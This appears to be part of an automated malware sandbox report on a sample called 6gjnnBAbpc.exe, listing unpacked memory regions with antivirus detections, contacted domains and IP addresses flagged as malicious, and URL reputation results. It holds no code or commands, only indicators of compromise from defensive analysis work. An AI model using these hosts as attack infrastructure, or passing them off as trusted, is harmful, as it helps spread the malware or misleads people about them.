                      22.2.svchost.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.pigalicapi.exe.2750000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.3.svchost.exe.2ff0000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      7.2.svchost.exe.406b200.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.2.svchost.exe.4036a00.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.6gjnnBAbpc.exe.2791e88.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.2.svchost.exe.4036a00.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.6gjnnBAbpc.exe.6a0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      6.3.svchost.exe.6e00000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.svchost.exe.4000000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.3.pigalicapi.exe.47712b9.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      7.2.svchost.exe.4004000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.2.pigalicapi.exe.4720000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.3.pigalicapi.exe.4720000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.6gjnnBAbpc.exe.b30000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.pigalicapi.exe.f10000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.3.pigalicapi.exe.47404b9.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      7.2.svchost.exe.4036a00.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.2.pigalicapi.exe.29f04b9.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      17.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      12.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.svchost.exe.4004000.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.6gjnnBAbpc.exe.c40000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.3.svchost.exe.2ff0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      7.3.svchost.exe.55a0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.svchost.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.3.pigalicapi.exe.c10000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      SourceDetectionScannerLabelLink
                      invictus.pl2%VirustotalBrowse
                      holp-ai.com2%VirustotalBrowse
                      www.fcwcvt.org1%VirustotalBrowse
                      impexnc.com0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-1536x864.jpg0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/0%Avira URL Cloudsafe
                      http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.19.00%Avira URL Cloudsafe
                      https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg0%Avira URL Cloudsafe
                      http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                      https://www.stajerskagz.si/o-sgz-2/0%Avira URL Cloudsafe
                      http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.00%Avira URL Cloudsafe
                      http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f10%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/0%Avira URL Cloudsafe
                      https://www.elpro.si/brand/inor/0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik0%Avira URL Cloudsafe
                      http://a-domani.com/0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/0%Avira URL Cloudsafe
                      https://www.elpro.si/brand/handheld/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.00%Avira URL Cloudsafe
                      https://www.pwd.org/0%Avira URL Cloudsafe
                      https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-768x432.jpg0%Avira URL Cloudsafe
                      http://www.valselit.com/174-appartement-a-vendre-grenoble-305140%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/0%Avira URL Cloudsafe
                      http://www.item-pr.com/qK0%Avira URL Cloudsafe
                      https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2.png0%Avira URL Cloudsafe
                      http://www.elpro.si/0%Avira URL Cloudsafe
                      http://www.credo.edu.pl/100%Avira URL Cloudmalware
                      http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni0%Avira URL Cloudsafe
                      http://www.abdg.com/0%Avira URL Cloudsafe
                      http://www.naoi-a.com/0%Avira URL Cloudsafe
                      http://sigtoa.com/0%Avira URL Cloudsafe
                      http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                      https://www.aevga.com/0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                      http://www.valselit.com/177-appartement-a-vendre-sigean-303780%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/0%Avira URL Cloudsafe
                      http://zugseil.com/0%Avira URL Cloudsafe
                      http://www.pwd.org/r0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                      http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                      http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub0%Avira URL Cloudsafe
                      http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                      http://myropcb.com/login/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e0%Avira URL Cloudsafe
                      http://www.winhui.cn/template/default/img/fixedimg4.png0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti0%Avira URL Cloudsafe
                      https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg0%Avira URL Cloudsafe
                      http://www.2print.com/ows0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.30%Avira URL Cloudsafe
                      http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.40%Avira URL Cloudsafe
                      http://www.pcgrate.com0%Avira URL Cloudsafe
                      http://www.myropcb.com/why-use-myro/terms-of-service/0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/0%Avira URL Cloudsafe
                      http://www.ora-ito.com/0%Avira URL Cloudsafe
                      http://umcor.am/0%Avira URL Cloudsafe
                      http://arowines.com/0%Avira URL Cloudsafe
                      http://vvsteknik.dk/0%Avira URL Cloudsafe
                      https://www.naoi-a.com/0%Avira URL Cloudsafe
                      https://dataform.co.uk/wp-signup.php?new=magicomm.co.uk0%Avira URL Cloudsafe
                      http://www.ka-mo-me.com/S0%Avira URL Cloudsafe
                      http://www.nelipak.nl/.K0%Avira URL Cloudsafe
                      https://www.pcgrate.com0%Avira URL Cloudsafe
                      http://oozkranj.com/0%Avira URL Cloudsafe
                      http://www.mobilnic.net/upload/img/201905280859514872.png0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.400%Avira URL Cloudsafe
                      http://vonparis.com/0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=16649598780%Avira URL Cloudsafe
                      http://ramkome.com/0%Avira URL Cloudsafe
                      https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-1170x658.png0%Avira URL Cloudsafe
                      http://www.yumgiskor.kz/0%Avira URL Cloudsafe
                      http://www.myropcb.com/wp-json/0%Avira URL Cloudsafe
                      https://layerslider.com0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.10%Avira URL Cloudsafe
                      https://pohlfood.com/#breadcrumb0%Avira URL Cloudsafe
                      https://www.pcgrate.com/checkout/0%Avira URL Cloudsafe
                      https://pohlfood.com/privacy-policy/0%Avira URL Cloudsafe
                      http://www.wifi4all.nl/MP0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os0%Avira URL Cloudsafe
                      http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg0%Avira URL Cloudsafe
                      https://www.elpro.si/kategorija-izdelka/rotronic/0%Avira URL Cloudsafe
                      http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=60%Avira URL Cloudsafe
                      http://www.elpro.si/wp-includes/js/jquery/ui/resizable.min.js?ver=1.13.20%Avira URL Cloudsafe
                      http://www.tc17.com/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.20%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      invictus.pl
                      193.107.88.74
                      truetrueunknown
                      holp-ai.com
                      59.106.13.169
                      truetrueunknown
                      impexnc.com
                      204.11.56.48
                      truetrueunknown
                      webways.com
                      188.114.97.3
                      truetrue
                        unknown
                        www.fcwcvt.org
                        188.114.96.3
                        truefalseunknown
                        dayvo.com
                        188.114.97.3
                        truetrue
                          unknown
                          hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                          3.130.253.23
                          truefalse
                            high
                            enguita.net
                            195.5.116.23
                            truefalse
                              unknown
                              15.204.18.132.datacname.com
                              15.204.18.132
                              truetrue
                                unknown
                                dataform.co.uk
                                83.223.113.46
                                truetrue
                                  unknown
                                  shteeble.com
                                  185.106.129.180
                                  truetrue
                                    unknown
                                    evcpa.com
                                    192.124.249.10
                                    truefalse
                                      unknown
                                      shittas.com
                                      43.246.117.171
                                      truetrue
                                        unknown
                                        kallman.net
                                        185.76.64.25
                                        truetrue
                                          unknown
                                          gphpedit.org
                                          127.0.0.1
                                          truetrue
                                            unknown
                                            bible.org
                                            104.20.54.214
                                            truefalse
                                              high
                                              missnue.com
                                              104.21.234.120
                                              truetrue
                                                unknown
                                                jsaps.com
                                                49.212.235.59
                                                truetrue
                                                  unknown
                                                  avse.hu
                                                  185.129.138.60
                                                  truetrue
                                                    unknown
                                                    pohlfood.com
                                                    104.218.10.254
                                                    truefalse
                                                      unknown
                                                      notis.ru
                                                      185.178.208.141
                                                      truetrue
                                                        unknown
                                                        canasil.com
                                                        104.26.3.14
                                                        truetrue
                                                          unknown
                                                          www.jenco.co.uk
                                                          172.67.208.67
                                                          truefalse
                                                            unknown
                                                            www.tyrns.com
                                                            62.75.216.137
                                                            truetrue
                                                              unknown
                                                              nts-web.net
                                                              49.212.235.175
                                                              truetrue
                                                                unknown
                                                                willsub.com
                                                                69.89.107.122
                                                                truefalse
                                                                  high
                                                                  ldh.la.gov
                                                                  75.2.95.235
                                                                  truefalse
                                                                    high
                                                                    shesfit.com
                                                                    188.114.96.3
                                                                    truetrue
                                                                      unknown
                                                                      www.vexcom.com
                                                                      172.67.173.200
                                                                      truefalse
                                                                        unknown
                                                                        cpmteam.com
                                                                        188.114.96.3
                                                                        truefalse
                                                                          high
                                                                          tcpoa.com
                                                                          159.89.244.183
                                                                          truetrue
                                                                            unknown
                                                                            kevyt.net
                                                                            104.21.2.101
                                                                            truefalse
                                                                              unknown
                                                                              www.mobilnic.net
                                                                              154.203.14.100
                                                                              truefalse
                                                                                unknown
                                                                                s5w.com
                                                                                192.99.226.184
                                                                                truetrue
                                                                                  unknown
                                                                                  www.sclover3.com
                                                                                  157.112.182.239
                                                                                  truetrue
                                                                                    unknown
                                                                                    in1.smtp.messagingengine.com
                                                                                    66.111.4.71
                                                                                    truetrue
                                                                                      unknown
                                                                                      paraski.org
                                                                                      94.130.164.242
                                                                                      truetrue
                                                                                        unknown
                                                                                        dog-jog.net
                                                                                        153.122.24.177
                                                                                        truetrue
                                                                                          unknown
                                                                                          kamptal.at
                                                                                          128.204.134.138
                                                                                          truetrue
                                                                                            unknown
                                                                                            bd-style.com
                                                                                            107.165.223.27
                                                                                            truetrue
                                                                                              unknown
                                                                                              ora.ecnet.jp
                                                                                              60.43.154.138
                                                                                              truefalse
                                                                                                high
                                                                                                adventist.ro
                                                                                                49.12.155.123
                                                                                                truetrue
                                                                                                  unknown
                                                                                                  www.edimart.hu
                                                                                                  81.2.194.241
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    zupraha.cz
                                                                                                    77.78.104.3
                                                                                                    truetrue
                                                                                                      unknown
                                                                                                      isom.org
                                                                                                      192.124.249.14
                                                                                                      truetrue
                                                                                                        unknown
                                                                                                        any-s.net
                                                                                                        108.170.12.50
                                                                                                        truetrue
                                                                                                          unknown
                                                                                                          muhr-soehne.de
                                                                                                          5.189.171.125
                                                                                                          truetrue
                                                                                                            unknown
                                                                                                            www.railbook.net
                                                                                                            81.171.22.4
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                                                                                              54.161.222.85
                                                                                                              truefalse
                                                                                                                high
                                                                                                                oaith.ca
                                                                                                                192.124.249.12
                                                                                                                truetrue
                                                                                                                  unknown
                                                                                                                  akr.co.id
                                                                                                                  104.20.123.68
                                                                                                                  truetrue
                                                                                                                    unknown
                                                                                                                    shztm.ru
                                                                                                                    62.122.170.171
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      www.abdg.com
                                                                                                                      192.252.154.18
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        www.spanesi.com
                                                                                                                        5.196.166.214
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          aiolos-sa.gr
                                                                                                                          188.114.96.3
                                                                                                                          truetrue
                                                                                                                            unknown
                                                                                                                            usadig.com
                                                                                                                            198.100.146.220
                                                                                                                            truetrue
                                                                                                                              unknown
                                                                                                                              metaforacom.com
                                                                                                                              185.42.105.162
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                dhh.la.gov
                                                                                                                                52.200.51.73
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  gmail-smtp-in.l.google.com
                                                                                                                                  142.251.31.26
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    fdlymca.org
                                                                                                                                    192.124.249.9
                                                                                                                                    truetrue
                                                                                                                                      unknown
                                                                                                                                      smtp1.sbc.mail.am0.yahoodns.net
                                                                                                                                      67.195.12.38
                                                                                                                                      truetrue
                                                                                                                                        unknown
                                                                                                                                        assideum.com
                                                                                                                                        52.219.177.56
                                                                                                                                        truetrue
                                                                                                                                          unknown
                                                                                                                                          www.hyabmagneter.se
                                                                                                                                          104.21.69.146
                                                                                                                                          truetrue
                                                                                                                                            unknown
                                                                                                                                            cbras.com
                                                                                                                                            54.39.198.18
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              atbauk.org
                                                                                                                                              104.21.92.170
                                                                                                                                              truetrue
                                                                                                                                                unknown
                                                                                                                                                bidroll.com
                                                                                                                                                13.56.33.8
                                                                                                                                                truetrue
                                                                                                                                                  unknown
                                                                                                                                                  www.vazir.se
                                                                                                                                                  206.191.152.37
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    www.naoi-a.com
                                                                                                                                                    202.254.236.40
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      d2r2uj0bnofxxz.cloudfront.net
                                                                                                                                                      65.9.95.48
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        www.valselit.com
                                                                                                                                                        193.70.68.254
                                                                                                                                                        truetrue
                                                                                                                                                          unknown
                                                                                                                                                          vvsteknik.dk
                                                                                                                                                          185.31.76.90
                                                                                                                                                          truetrue
                                                                                                                                                            unknown
                                                                                                                                                            biosolve.com
                                                                                                                                                            151.101.130.159
                                                                                                                                                            truetrue
                                                                                                                                                              unknown
                                                                                                                                                              karmy.com.pl
                                                                                                                                                              185.253.212.22
                                                                                                                                                              truetrue
                                                                                                                                                                unknown
                                                                                                                                                                www.fe-bauer.de
                                                                                                                                                                3.65.101.129
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  smtp.mail.global.gm0.yahoodns.net
                                                                                                                                                                  87.248.97.36
                                                                                                                                                                  truetrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vdoherty.com
                                                                                                                                                                    91.216.241.100
                                                                                                                                                                    truetrue
                                                                                                                                                                      unknown
                                                                                                                                                                      hbfuels.com
                                                                                                                                                                      85.233.160.148
                                                                                                                                                                      truetrue
                                                                                                                                                                        unknown
                                                                                                                                                                        pb-games.com
                                                                                                                                                                        173.254.28.29
                                                                                                                                                                        truetrue
                                                                                                                                                                          unknown
                                                                                                                                                                          mackusick.de
                                                                                                                                                                          217.160.0.131
                                                                                                                                                                          truetrue
                                                                                                                                                                            unknown
                                                                                                                                                                            nekono.net
                                                                                                                                                                            202.172.28.187
                                                                                                                                                                            truetrue
                                                                                                                                                                              unknown
                                                                                                                                                                              ncn.de
                                                                                                                                                                              46.30.60.158
                                                                                                                                                                              truetrue
                                                                                                                                                                                unknown
                                                                                                                                                                                fnw.us
                                                                                                                                                                                137.118.26.67
                                                                                                                                                                                truetrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  komie.com
                                                                                                                                                                                  59.106.13.181
                                                                                                                                                                                  truetrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    ftmobile.com
                                                                                                                                                                                    199.34.228.78
                                                                                                                                                                                    truetrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      www.x0c.com
                                                                                                                                                                                      185.53.177.50
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        onzcda.com
                                                                                                                                                                                        13.248.169.48
                                                                                                                                                                                        truetrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          sledsport.ru
                                                                                                                                                                                          185.22.232.175
                                                                                                                                                                                          truetrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            www.findbc.com
                                                                                                                                                                                            13.248.216.40
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              tbvlugus.nl
                                                                                                                                                                                              174.129.25.170
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                pellys.co.uk
                                                                                                                                                                                                77.72.4.226
                                                                                                                                                                                                truetrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  cubodown.com
                                                                                                                                                                                                  104.21.30.14
                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    infotech.pl
                                                                                                                                                                                                    79.96.32.254
                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      semuk.com
                                                                                                                                                                                                      52.128.23.153
                                                                                                                                                                                                      truetrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        tozzhin.com
                                                                                                                                                                                                        202.94.166.30
                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          tabbles.net
                                                                                                                                                                                                          188.114.96.3
                                                                                                                                                                                                          truetrue
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            cqdgroup.com
                                                                                                                                                                                                            221.132.33.88
                                                                                                                                                                                                            truetrue
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              www.muhr-soehne.de
                                                                                                                                                                                                              5.189.171.125
                                                                                                                                                                                                              truetrue
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                fortknox.bm
                                                                                                                                                                                                                216.177.137.32
                                                                                                                                                                                                                truetrue
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  camamat.com
                                                                                                                                                                                                                  104.21.235.31
                                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    lyto.net
                                                                                                                                                                                                                    188.114.97.3
                                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                      http://a-domani.com/true
                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://www.elpro.si/false
                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://www.credo.edu.pl/false
                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://sigtoa.com/false
                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://dhh.la.gov/false
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://www.naoi-a.com/false
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://www.abdg.com/false
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://msl-lock.com/false
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://zugseil.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.ora-ito.com/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://vvsteknik.dk/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://umcor.am/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://arowines.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://dataform.co.uk/wp-signup.php?new=magicomm.co.uktrue
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://oozkranj.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://vonparis.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://ramkome.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.tc17.com/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                          https://www.stajerskagz.si/o-sgz-2/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
